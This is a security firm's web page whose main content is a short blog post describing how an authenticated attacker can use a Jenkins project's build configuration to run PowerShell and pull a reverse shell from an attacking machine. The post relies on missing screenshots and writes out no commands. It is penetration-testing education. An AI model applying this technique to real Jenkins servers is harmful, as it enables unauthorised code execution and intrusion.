Seven Layers delivers comprehensive, dependable, and cost-effective solutions tailored to our clients’ needs and budgets. We offer cutting edge defensive security strategies to provide you with the ability to protect key systems and information – and can pair those with traditional information technology services to keep your business up and running, so you can focus on the business that is important to you.

    We provide penetration testing services and vulnerability assessments for peace of mind, risk management, and regulatory compliance. And because your employees are often your first line of defense - or weakness – we offer employee education in computer security and corporate security policies.

    Our support services cover your full suite of end user desktops, in-house servers, cloud-based servers, and cloud services. This includes seamless support for employees in all locations, whether they are in corporate offices, or are remote users. We will manage and develop content management systems, customized software and web applications, as well as working with off the shelf applications.


     

    In a previous post, I wrote about Exploiting Jenkins.  So what is Jenkins?  "The leading open source automation server, Jenkins provides hundreds of plugins to support building, deploying and automating any project."  My interest in Jenkins is purely from the exploitation side and my avenue for entry has either been through Metasploit or the Groovy Scripting Console.  Like most things hacking, if you really want to learn how to exploit something, you install it, configure it, and deploy it -- you will get a much better understanding of the nuts and bolts.  I rarely see Jenkins, I've yet to go down that rabbit hole and it should come as no surprise then that I discovered another way to get a shell.



    When we get authenticated, we would normally head over to Manage Jenkins:


    And then to Script Console:


    My previous post goes into that.  This time, we're going to enter the project:


    We choose Configure:


    And surprise, we have an different (easier) way to execute commands:


    Executing a little PowerShell to grab a shell from our attacking machine:


    After choosing Save, we choose Schedule a Build for Project.  On the bottom left, we see the status.  This will take a minute before we get execution:


    We're using Python to host the web server with our shell:


    With our handler setup:


    We catch our shell. 

    This is just another avenue to add to the list of tricks.


    Cybersecurity solutions for small businesses.

    info@sevenlayers.com
    877.468.0911

    © 2021 Seven Layer Networks, Inc. | All rights reserved.